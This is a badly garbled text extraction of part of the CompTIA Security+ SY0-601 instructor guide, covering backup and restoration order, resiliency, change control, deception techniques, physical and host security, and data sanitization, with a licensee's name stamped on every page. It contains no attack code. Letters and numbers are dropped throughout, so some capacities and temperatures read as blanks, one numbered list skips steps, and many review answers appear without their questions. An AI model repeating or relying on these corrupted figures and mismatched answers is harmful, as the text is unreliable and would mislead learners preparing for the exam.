Digital tape systems are a popular choice for institutions with multi terabyte storage
re uirements. Tape is very cost e ective and, given a media rotation system, tapes can
be transported o site. The latest generation of tape will store about terabytes
per cartridge or up to about T with compression. The main drawback of tape is
that it is slow, compared to disk based solutions, especially for restore operations.
If a site su ers an uncontrolled outage, in ideal circumstances processing will be estoration rder
switched to an alternate site and the outage can be resolved without any service
interruption. If an alternate processing site is not available, then the main site must be Teaching
brought back online as uickly as possible to minimi e service disruption. This does Tip
not mean that the process can be rushed, however. A comple facility such as a data ritish Airways' data
center or campus network must be reconstituted according to a carefully designed center problems
order of restoration. If systems are brought back online in an uncontrolled way, there make a good
is the serious risk of causing additional power problems or of causing problems in the e ample of why
order of restoration
network, , or application layers because dependencies between di erent appliances is a critical topic
and servers have not been met. computerweekly.com
news
In very general terms, the order of restoration will be as follows
The ritish Airways
1. nable and test power delivery systems grid power, power distribution units IT outage hat
D s, , secondary generators, and so on . went wrong with its
datacentre .
2. nable and test switch infrastructure, then routing appliances and systems.
5. nable and test back end and middleware databases and business logic . erify
data integrity.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
528 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Live boot media another option is to use an instance that boots from read only
storage to memory rather than being installed on a local read write hard disk.
• Automated build from a template similar to a master image, this is the build
instructions for an instance. ather than storing a master image, the software may
build and provision an instance according to the template instructions.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 529
Review Activity:
Backup Strategies
Answer the following uestions
1. What type of scheduled Windows backup job does not clear the archive
attribute?
A di erential backup. This type of backup selects all new and modified data since the
previous full backup. ou could also mention copy backups, though these are usually
ad hoc rather than scheduled.
The volume shadow copy service creates snapshots for the backup software to use,
avoiding problems with file locks and uncompleted database transactions.
True. As a security precaution, backup media can be taken o ine at the completion of
a ob to mitigate the risk of malware corrupting the backup.
4. You are advising a company about backup requirements for a few dozen
application servers hosting tens of terabytes of data. The company requires
online a aila ilit o short term ac ups plus o site securit media and
long-term archive storage. The company cannot use a cloud solution. What
type of on-premises storage solution is best suited to the requirement?
The o site and archive re uirements are best met by a tape solution, but the online
re uirement may need a AID array, depending on speed. The re uirement is probably
not large enough to demand a storage area network AN , but could be provisioned as
part of one.
There may be unmet dependencies between systems that are started in the wrong
order. This could lead to boot failures and possibly data corruption.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
530 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 20C
Implement Cybersecurity
Resiliency Strategies
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 531
• Diagrams are the best way to capture the comple relationships between network
elements. Diagrams can be used to show how CIs are involved in business
work ows, logical I and physical network topologies, and network rack layouts.
emember, it is not sufficient simply to create the diagram, you must also keep the
diagram up to date.
An asset management process tracks all the organi ation's critical systems, Asset Management
components, devices, and other ob ects of value in an inventory. It also involves
collecting and analy ing information about these assets so that personnel can make Interaction
more informed changes or otherwise work with assets to achieve business goals. Opportunity
There are many software suites and associated hardware solutions available for If you do have some
e tra time, ask
tracking and managing assets. An asset management database can be configured to students what naming
store as much or as little information as is deemed necessary, though typical data conventions they have
would be type, model, serial number, asset ID, location, user s , value, and service encountered. Note
information. the past propensity
to use arbitrary, but
colorful, server names.
e are focusing on assets that re uire some degree of configuration (CIs). An organization
ome schemes code
will also have many assets with no configuration re uirement, such as furniture.
location attributes,
but they are less
relevant to the cloud.
unctional names can
Asset Identification and tandard amin Con entions be tricky if devices
subse uently change
Tangible assets can be identified using a barcode label or radio fre uency ID ID tag function. ne school
attached to the device or more simply, using an identification number . An ID tag is of thought is that a
single convention that
a chip programmed with asset data. hen in range of a scanner, the chip activates and tries to code multiple
signals the scanner. The scanner alerts management software to update the device's fields within a single
location. As well as asset tracking, this allows the management software to track the string that will remain
location of the device, making theft more difficult. consistent over time
is an impossible goal,
A standard naming convention for hardware assets, and for digital assets such as so the ID should
accounts and virtual machines, makes the environment more consistent. This means ust be an arbitrary
that errors are easier to spot and that it is easier to automate through scripting. The string, colorful or not,
naming strategy should allow administrators to identify the type and function of any and devices located
and selected via
particular resource or location at any point in the CMD or network directory. ach attributes and tags,
label should conform to rules for host and DN names support.microsoft.com en us possibly using CNAM
help naming conventions in active directory for computers domains sites and T T records
and . As well as an ID attribute, the location and function of tangible and digital assets watson wilson.ca
can be recorded using attribute tags and fields or DN CNAM and T T resource blog host
naming .
records.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
532 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Change Control
A change control process can be used to re uest and approve changes in a planned
and controlled way. Change re uests are usually generated when something needs
to be corrected, when something changes, or when there is room for improvement in
a process or system currently in place. The need to change is often described either
as reactive, where the change is forced on the organi ation, or as proactive, where
the need for change is initiated internally. Changes can also be categori ed according
to their potential impact and level of risk ma or, significant, minor, or normal, for
instance . In a formal change management process, the need or reasons for change
and the procedure for implementing the change is captured in a re uest for change
C document and submitted for approval.
The C will then be considered at the appropriate level and a ected stakeholders will
be notified. This might be a supervisor or department manager if the change is normal
or minor. Ma or or significant changes might be managed as a separate pro ect and
re uire approval through a change advisory board CA .
Change Management
The implementation of changes should be carefully planned, with consideration for
how the change will a ect dependent components. or most significant or ma or
changes, organi ations should attempt to trial the change first. very change should be
accompanied by a rollback or remediation plan, so that the change can be reversed
if it has harmful or unforeseen conse uences. Changes should also be scheduled
sensitively if they are likely to cause system downtime or other negative impact on
the work ow of the business units that depend on the IT system being modified. Most
networks have a scheduled maintenance window period for authori ed downtime.
hen the change has been implemented, its impact should be assessed, and the
process reviewed and documented to identify any outcomes that could help future
change management pro ects.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 533
• A warm site could be similar, but with the re uirement that the latest data set will
need to be loaded.
• A cold site takes longer to set up. A cold site may be an empty building with a lease
agreement in place to install whatever e uipment is re uired when necessary.
Clearly, providing redundancy on this scale can be very e pensive. ites are often
leased from service providers. owever, in the event of a nationwide emergency,
demand for the services is likely to e ceed supply Another option is for businesses to
enter into reciprocal arrangements to provide mutual support. This is cost e ective but
comple to plan and set up.
Another issue is that creating a duplicate of anything doubles the comple ity of
securing that resource properly. The same security procedures must apply to
redundant sites, spare systems, and backup data as apply to the main copy.
or many companies, the most cost e ective solution is to move processing and data
storage to the cloud.
Layered security is typically seen as improving cybersecurity resiliency because Diversity and Defense
it provides defense in depth. The idea is that to fully compromise a system, the in Depth
attacker must get past multiple security controls, providing control diversity. These
layers reduce the potential attack surface and make it much more likely that an attack
will be deterred or prevented, or at least detected and then prevented by manual
intervention.
• ndpoint security technical control on the laptop could scan the media for
malware or block access automatically.
• ecurity locks inserted into ports physical control on the laptop could prevent
attachment of media without re uesting a key, allowing authori ation checks to be
performed first.
• ermissions restricting Alan's user account technical control could prevent the
malware from e ecuting successfully.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
534 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• The use of encrypted and digitally signed media technical control could prevent or
identify an attempt to tamper with it.
• If the laptop were compromised, intrusion detection and logging alerting systems
technical control could detect and prevent the malware spreading on the network.
Vendor Diversity
As well as deploying multiple types of controls, you should consider the advantages
of leveraging vendor diversity. endor diversity means that security controls are
sourced from multiple suppliers. A single vendor solution is a tempting choice for many
organi ations, as it provides interoperability and can reduce training and support costs.
ome disadvantages could include the following
• Not obtaining best in class performance one vendor might provide an e ective
firewall solution, but the bundled malware scanning is found to be less e ective.
• Less comple attack surface a single vulnerability in a supplier's code could put
multiple appliances at risk in a single vendor solution. A threat actor will be able to
identify controls and possible weaknesses more easily.
• Less innovation dependence on a single vendor might make the organi ation
invest too much trust in that vendor's solutions and less willing to research and test
new approaches.
Crypto Diversity
This concept can be e tended to the selection of algorithms and implementations
of cryptography. Adoption of methods such as blockchain based IAM ibm.com
blogs blockchain decentrali ed identity an alternative to password based
authentication or selecting ChaCha in place of A as a preferred cipher suite
blog.cloud are.com it takes two to chacha poly forces threat actors to develop
new attack methods.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 535
software e ploits, and spammers' abuse of open relay mail systems. These systems
are generally fully e posed to the Internet. n a production network, a honeypot is
more likely to be located in a DM , or on an isolated segment on the private network
if the honeypot is seeking to draw out insider threats . This provides early warning
and evidence of whether an attacker has been able to penetrate to a given security
one. This can help the security team find the source of the attack and take more
comprehensive steps to completely eradicate the threat from the organi ation.
A honeypot or honeynet can be combined with the concept of a honeyfile, which is
convincingly useful, but actually fake, data. This honeyfile can be made trackable, so
that when a threat actor successfully e filtrates it, the attempts to resuse or e ploit it
can be traced.
or e ample, an organi ation constructs a database full of benign or meaningless
data disguised as important financial records. This deception strategy might involve
breadcrumbs inserted into the production environment to subtly guide a threat actor
toward the spoofed loot fidelissecurity.com threatgeek deception breadcrumbs
intelligent deception . The database is placed behind a subnet with lowered defenses,
which baits an attacker into trying to e filtrate this useless data. Identifying the attacker
also allows an organi ation to pursue an attribution strategy. Attribution means the
organi ation publici es the attacker's role and publishes the methods used as threat
intelligence.
Disruption Strategies
Another type of active defense uses disruption strategies. These adopt some of the
obfuscation strategies used by malicious actors. The aim is to raise the attack cost and
tie up the adversary's resources. ome e amples of disruption strategies include
• sing bogus DN entries to list multiple hosts that do not e ist.
• sing port triggering or spoofing to return fake telemetry data when a host detects
port scanning activity. This will result in multiple ports being falsely reported as
open and will slow down the scan. Telemetry can refer to any type of measurement
or data returned by remote scanning. imilar fake telemetry could be used to report
I addresses as up when they are not, for instance.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
536 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Cybersecurity Resiliency Strategies
Answer the following uestions
Configuration errors are more likely, especially where comple access control lists
ACLs and security monitoring sensor deployment is re uired.
A change control process governs the way changes are re uested and approved. A
change management process governs the way that planned change is implemented
and the way unplanned change is handled.
ot, warm, and cold sites, referring to the speed with which a site can failover.
endor diversity.
ake telemetry means that when a threat actor runs port or host discovery scans, a
spoof response is returned. This could lead the threat actor to waste time probing the
port or host I address trying to develop an attack vector that does not actually e ist.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 537
Lesson 20
Summary
ou should be able to use redundancy, backup, configuration change management, Teaching
diversity, and deception to improve cybersecurity resilience. Tip
Check that students
Guidelines for Implementing Cybersecurity Resilience are confident about
the content that has
ollow these guidelines for implementing cybersecurity resilience been covered. If there
is time, revisit any
• et up a configuration management system and ensure that it is kept up to date content e amples that
they have uestions
• An inventory to track assets, using standard naming convention and labelling. about. If you have
used all the available
• aseline configuration information for each configuration item. time for this lesson
block, note the issues,
• Diagrams showing relationships between assets in work ows and networks. and schedule time for
a review later in the
• nsure that changes to work ows and assets are governed by change control and course.
change management processes.
Interaction
• Develop a backup strategy and ensure that the order of restoration is fully tested Opportunity
ptionally, ask
• Determine and recovery windows for di erent data assets. students whether they
have witnessed any
• eparate data from compute functions to ensure nonpersistence during recovery. restore from backup
events that went
• elect media that meets storage and onsite o site plus online o ine storage either disastrously or
re uirements disk, tape, NA , and AN . very well.
• sing risk assessments, identify assets that have high availability re uirements and
provision redundancy to meet this re uirement
• NIC teaming, multiple paths, and load balancing to make networks resilient.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 21
Explaining Physical Security
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
540 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 21A
Explain the Importance of Physical
Site Security ontrols
• Accounting—keep a record of when entry/exit points are used and detect security
breaches.
Show Slide(s)
Physical security can be thought of in terms of zones. Each zone should be separated
Site Layout, Fencing, by its own barrier(s). Entry and exit points through the barriers need to be controlled
and Lighting by one or more security mechanisms. Progression through each zone should be
progressively more restricted.
Teaching
Tip
Make sure students
Site Layout, Fencing, and Lighting
are familiar with
the di erent
In e isting premises, there will not be much scope to in uence site layout. owever,
types of physical given constraints of cost and existing infrastructure, try to plan the site using the
access controls— following principles:
barriers, gateways,
locks, alarms, and • Locate secure zones, such as equipment rooms, as deep within the building as
surveillance. possible, avoiding external walls, doors, and windows.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 541
• Use a demilitarized zone (DMZ) design for the physical space. Position public access
areas so that guests do not pass near secure zones. Security mechanisms in public
areas should be highly visible, to increase deterrence.
• Use signage and warnings to enforce the idea that security is tightly controlled.
eyond basic no trespassing signs, some homes and offices also display signs from
the security companies whose services they are currently using. These may convince
intruders to stay away.
• Try to minimi e traffic having to pass between ones. The ow of people should be
"in and out" rather than "across and between."
• ive high traffic public areas high visibility, so that covert use of gateways, network
access ports, and computer e uipment is hindered, and surveillance is simplified.
• In secure zones, do not position display screens or input devices facing toward
pathways or windows. Alternatively, use one-way glass so that no one can look in
through windows.
Sites where there is a risk of a terrorist attack will use barricades such as bollards and
security posts to prevent vehicles from approaching closely to a building at high speed.
Fencing
The exterior of a building may be protected by fencing. Security fencing needs to be
transparent (so that guards can see any attempt to penetrate it), robust (so that it is
difficult to cut , and secure against climbing which is generally achieved by making it tall
and possibly by using ra or wire . encing is generally e ective, but the drawback is that
it gives a building an intimidating appearance. Buildings that are used by companies to
welcome customers or the public may use more discreet security methods.
Lighting
Security lighting is enormously important in contributing to the perception that a
building is safe and secure at night. Well-designed lighting helps to make people feel
safe, especially in public areas or enclosed spaces, such as parking garages. Security
lighting also acts as a deterrent by making intrusion more difficult and surveillance
(whether by camera or guard) easier. The lighting design needs to account for overall
light levels, the lighting of particular surfaces or areas (allowing cameras to perform
facial recognition, for instance), and avoiding areas of shadow and glare.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
542 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Generic examples of locks—From left to right, a standard key lock, a deadbolt lock, and an electronic
keypad lock. (Images from user macrovector 1 .com.)
Generic examples of a biometric thumbprint scanner lock and a token-based key card lock.
(Images from user macrovector 1 .com.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 543
Mantraps
Apart from being vulnerable to lock picking, the main problem with a simple door or
gate as an entry mechanism is that it cannot accurately record who has entered or left
an area. Multiple people may pass through the gateway at the same time a user may
hold a door open for the ne t person an unauthori ed user may tailgate behind an
authorized user. This risk may be mitigated by installing a turnstile (a type of gateway
that only allows one person through at a time). The other option is to add some sort of
surveillance on the gateway. Where security is critical and cost is no object, an access
control vestibule, or mantrap, could be employed. A mantrap is where one gateway
leads to an enclosed space protected by another barrier.
Cable Locks
Cable locks attach to a secure point on the device chassis. A server chassis might come
with both a metal loop and a Kensington security slot. As well as securing the chassis
to a rack or desk, the position of the secure point prevents the chassis from being
opened, without removing the cable first.
Some types of smart cards used as passkeys for electronic locks can be vulnerable to Physical Attacks
cloning and skimming attacks: against mart Cards
and USB
• Card cloning—this refers to making one or more copies of an existing card. A
lost or stolen card with no cryptographic protections can be physically duplicated.
Card loss should be reported immediately so that it can be revoked and a new one
issued. If there were a successful attack, it might be indicated by use of a card in a
suspicious location or time of day.
These attacks can generally only target "dumb" smart cards that transfer tokens rather
than perform cryptoprocessing. Bank-issued smart cards, referred to as EMV (Electron,
MasterCard, isa , can also be vulnerable through the magnetic strip, which is retained
for compatibility.
When evaluating risks from card cloning and skimming, you need to realize that there are
many types of smart card. or example, old I A E Classic cards used as public transit
payment cards are easily cloned because they use a weak cryptographic implementation.
Building entry systems using contactless cards with no cryptoprocessing are also vulnerable
(youtube.com watch v cxxnuof Ec ). Cloning of I A E E or E smart cards that
implement a TPM-like cryptoprocessor is not thought to be possible.
Malicious USB charging cables and plugs are also a widespread problem. As with card
skimming, a device may be placed over a public charging port at airports and other
transit locations. A USB data blocker can provide mitigation against these juice-
jacking attacks by preventing any sort of data transfer when the smartphone or laptop
is connected to a charge point (zdnet.com/article/this-cheap-gadget-can-stop-your-
smartphone-or-tablet-being-hacked-at-an-airport-hotel-or-cafe).
When designing premises security, you must consider the security of entry points that Alarm Systems and
could be misused, such as emergency exits, windows, hatches, grilles, and so on. These Sensors
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
544 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
may be fitted with bars, locks, or alarms to prevent intrusion. Also consider pathways
above and below, such as false ceilings and ducting. There are five main types of alarm
• Circuit a circuit based alarm sounds when the circuit is opened or closed,
depending on the type of alarm. This could be caused by a door or window opening
or by a fence being cut. A closed-circuit alarm is more secure because an open
circuit alarm can be defeated by cutting the circuit.
• Proximity—radio frequency ID (RFID) tags and readers can be used to track the
movement of tagged objects within an area. This can form the basis of an alarm
system to detect whether someone is trying to remove equipment.
• Duress this type of alarm is triggered manually by sta if they come under
threat. There are many ways of implementing this type of alarm, including wireless
pendants, concealed sensors or triggers, and D CT handsets or smartphones. ome
electronic entry locks can also be programmed with a duress code that is di erent
from the ordinary access code. This will open the gateway but also alert security
personnel that the lock has been operated under duress.
Circuit based alarms are typically suited for use at the perimeter and on windows
and doors. These may register when a gateway is opened without using the lock
mechanism properly or when a gateway is held open for longer than a defined period.
Motion detectors are useful for controlling access to spaces that are not normally
used. Duress alarms are useful for e posed sta in public areas. An alarm might simply
sound an alert or it may be linked to a monitoring system. Many alarms are linked
directly to local law enforcement or to third-party security companies. A silent alarm
alerts security personnel rather than sounding an audible alarm.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 545
The cameras in a CCT network are typically connected to a multiple er using coa ial
cabling. The multiplexer can then display images from the cameras on one or more
screens, allow the operator to control camera functions, and record the images to tape
or hard drive. Newer camera systems may be linked in an IP network, using regular
data cabling.
If you consider control types, a security guard is a preventive control, as the guard can both
discover and act to prevent an attack. A camera is a detective control only.
Camera systems and robotics can use AI and machine learning to implement smart
physical security (theverge.com artificial intelligence surveillance
cameras-security):
• Motion recognition the camera system might be configured with gait identification
technology. This means that the system can generate an alert when anyone moves
within sight of the camera and the pattern of their movement does not match a
known and authorized individual.
• Object detection—the camera system can detect changes to the environment, such
as a missing server, or unknown device connected to a wall port.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
546 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Intruders and or security guards may be armed. The safety of sta and compliance
with local laws has to be balanced against the imperative to protect the company's
other resources.
It is much easier for employees to use secure behavior in these situations if they know
that their actions are conforming to a standard of behavior that has been agreed upon
and is expected of them.
Two-Person Integrity/Control
eception areas for high security ones might be sta ed by at least two people at all
times, providing integrity for entry control and reducing the risk of insider threat.
ID Badges
A photographic ID badge showing name and (perhaps) access details is one of the
cornerstones of building security. Anyone moving through secure areas of a building
should be wearing an ID badge anyone without an ID badge should be challenged.
Color coding could be used to make it obvious to which ones a badge is granted
access.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 547
Review Activity:
hysical Site Security ontrols
Answer the following questions:
Lighting is one of the most e ective deterrents. Any highly visible security control
guards, fences, dogs, barricades, CCT , signage, and so on will act as a deterrent.
One type of proximity reader allows a lock to be operated by a contactless smart card.
Proximity sensors can also be used to track objects via RFID tags.
3. What are the two main options for mobile camera surveillance?
A USB data blocker can be attached to the end of a cable to prevent a charging port
from trying to make a data connection.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
548 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 21B
Explain the Importance of Physical
ost Security ontrols
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 549
ome data centers may contain racks with e uipment owned by di erent companies
(colocation). These racks can be installed inside cages so that technicians can only
physically access the racks housing their own company's servers and appliances.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
550 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A hardened PDS is one where all cabling is routed through sealed metal conduit and
sub ect to periodic visual inspection. Lower grade options are to use di erent materials
for the conduit (plastic, for instance). Another option is to install an alarm system within
the cable conduit, so that intrusions can be detected automatically.
It is possible to install communications equipment within a shielded enclosure,
known as a Faraday Cage. The cage is a charged conductive mesh that blocks
signals from entering or leaving the area. The risk of eavesdropping from leakage
of electromagnetic signals was investigated by the DoD who defined T M T
(Transient Electromagnetic Pulse Emanation Standard) as a means of shielding the
signals.
Some data centers (notably those operated by Google) are allowing higher temperatures
(up to around 6 C 0 ). This can achieve significant energy cost savings and modern
electronics is proving reliable at this temperature.
The positive air pressure created by the AC system also forces contaminants such as
dust out of the facility. ilters on AC systems collect the dust and must be changed
regularly. When using an air conditioning system, ensure that it is inspected and
maintained periodically. ystems may be fitted with alarms to alert sta to problems.
Mission critical systems may require a backup air conditioning system.
The server room should not be used as storage space. o not leave boxes or unused
equipment in it. Also, do not install unnecessary devices that generate a lot of heat and
dust, such as printers.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 551
A data center or server room should be designed in such a way as to ma imi e air ow ot and Cold Aisles
across the server or racks. If multiple racks are used, install equipment so that servers
are placed back-to-back not front-to-back, so that the warm exhaust from one bank of
servers is not forming the air intake for another bank. This is referred to as a hot aisle/
cold aisle arrangement. In order to prevent air leaks from the hot aisle to the cold
aisle, ensure that any gaps in racks are filled by blank panels and use strip curtains or
excluders to cover any spaces above or between racks.
ot aisle containment design Cold air circulates from the air conditioner under the oor and around
the rack, while hot air is drawn from between the racks through the ceiling space (plenum) to a heat
exchanger. In this design, it is important that hot air does not leak from the ceiling or from the oor
space between the racks. (Image 1 .com.)
Make sure that cabling is secured by cable ties or ducting and does not run across
walkways. Cable is best run using a raised oor. If running cable through plenum
spaces, make sure it is fire retardant and be conscious of minimi ing pro imity to
electrical sources, such as electrical cable and uorescent light, which can corrupt data
signals (Electromagnetic Interference [EMI]). You also need to ensure that there is
sufficient space in the plenum for the air conditioning system to work properly filling
the area with cable is not the best idea.
To reduce interference, data network cabling should not be run parallel to power cabling. If
E I is a problem, shielded cabling can be installed. Alternatively, the copper cabling could
be replaced with fiber optic cabling, which is not susceptible to E I.
ealth and safety legislation dictates what mechanisms an organi ation must put in Fire Detection and
place to detect and suppress fires. ome basic elements of fire safety include uppression
• ell marked fire e its and an emergency evacuation procedure that is tested and
practiced regularly.
• uilding design that does not allow fire to spread uickly, by separating di erent
areas with fire resistant walls and doors.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
552 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Automatic smoke or fire detection systems, as well as alarms that can be operated
manually.
Fire suppression systems work on the basis of the fire triangle. The fire triangle
works on the principle that a fire re uires heat, o ygen, and fuel to ignite and burn.
emoving any one of those elements provides fire suppression and prevention . In
the and most other countries , fires are divided by class under the N A National
Fire Protection Association) system, according to the combustible material that fuels
the fire. ortable fire e tinguishers come in several di erent types, with each type
being designed for fighting a particular class of fire. Notably, Class C e tinguishers use
gas-based extinguishing and can be used where the risk of electric shock makes other
types unsuitable.
remises may also be fitted with an overhead sprinkler system. et pipe sprinklers
work automatically, are triggered by heat, and discharge water. Wet-pipe systems
constantly hold water at high pressure, so there is some risk of burst pipes and
accidental triggering, as well as the damage that would be caused in the event of
an actual fire. There are several alternatives to wet pipe systems that can minimi e
damage that may be caused by water ooding the room.
• Dry pipe these are used in areas where free ing is possible water only enters this
part of the system if sprinklers elsewhere are triggered.
• re action a pre action system only fills with water when an alarm is triggered
it will then spray when the heat rises. This gives protection against accidental
discharges and burst pipes and gives some time to contain the fire manually before
the sprinkler operates.
• alon gas based systems have the advantage of not short circuiting electrical
systems and leaving no residue. p until a few years ago, most systems used alon
. The use of alon has been banned in most countries as it is o one depleting,
though existing installations have not been replaced in many instances and can
continue to operate legally.
• Clean agent alternatives to alon are referred to as clean agent. As well as not
being environmentally damaging, these gases are considered nontoxic to humans.
amples include IN N a mi ture of C 2, argon, and nitrogen , M C
, and . The gases both deplete the concentration of o ygen in the area
though not to levels dangerous to humans and have a cooling e ect. C 2 can be
used too, but it is not safe for use in occupied areas.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 553
Files deleted from a magnetic-type hard disk are not erased. Rather, the sectors are Data aniti ation Tools
marked as available for writing and the data they contain will only be removed as new
files are added. imilarly, using the standard indows format tool will only remove Teaching
references to files and mark all sectors as usable. Tip
The standard method of saniti ing an DD is called overwriting. This can be performed It seems fitting to
end the course with
using the drive's firmware tools or a utility program. The most basic type of overwriting irrevocable techniques
is called ero filling, which ust sets each bit to ero. ingle pass ero filling can leave to utterly destroy
patterns that can be read with specialist tools. A more secure method is to overwrite information!
the content with one pass of all zeros, then a pass of all ones, and then a third pass in a
pseudorandom pattern. Some secret service agencies require more than three passes.
Overwriting can take a considerable amount of time to complete, depending on the
number of passes.
Active ill isk data wiping software. (Screenshot used with permission from Soft Technologies, Inc.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
554 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Examples of tools supporting secure file or disk erasing include Sdelete (part of Sysinternals
docs.microsoft.com/sysinternals) and arik s oot and uke (dban.org), plus the Active
ill isk suite shown here.
If the device firmware does not support encryption, using a software disk encryption
product and then destroying the key and using SE should be sufficient for most
confidentiality re uirements.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 555
Review Activity:
hysical ost Security ontrols
Answer the following questions:
This can be described as an air gap or secure area demilitarized zone (DMZ).
2. here ould ou e pect to find hot and cold aisles and hat is their
purpose?
This layout is used in a data center or large server room. The layout is the best way to
maintain a stable temperature and reduce loss of availability due to thermal problems.
Make conduit physically difficult to access, use alarms to detect attempts to interfere
with conduit, and use shielded cabling.
4. What physical security device could you use to ensure the safety of onsite
backup tapes?
A crypto erase or Instant Secure Erase (ISE) sanitizes media by encrypting the data and
then erasing the crytpographic key.
Degaussing is ine ective against all types of ash media, including thumb drives, Ds,
hybrid drives, and memory cards.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
556 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 21
Summary
Teaching You should be able to explain the importance of physical security controls for access,
Tip surveillance, environmental protection, and secure data destruction.
Check that students
are confident about
the content that has
Guidelines for Physical Security Controls
been covered. If there
Follow these guidelines for deploying or upgrading physical security controls:
is time, revisit any
content examples that • If possible, design sites as zones to maximize access controls and surveillance for
they have questions the most secure areas, using industrial camou age, DM s, air gaps, vaults, and safes
about. If you have
used all the available
where applicable.
time for this lesson
block, note the issues,
• Secure the site perimeter and access points using fencing, barricades/bollards, and
and schedule time for locks (physical, electronic, and biometric). If using smart cards, use a type that is
a review later in the resistant to cloning/skimming.
course.
• Monitor the site using security guards, CCT , robot sentries, and drones A , and
use e ective lighting to ma imi e surveillance.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A
Mapping Course Content to CompTIA
Security+ (Exam SY0-601)
Achieving CompTIA ecurity certification re uires candidates to pass am .
This table describes where the e am ob ectives for am are covered in this
course.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-2 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-3
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-4 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-5
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-6 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-7
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-8 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-9
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-10 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-11
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-12 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-13
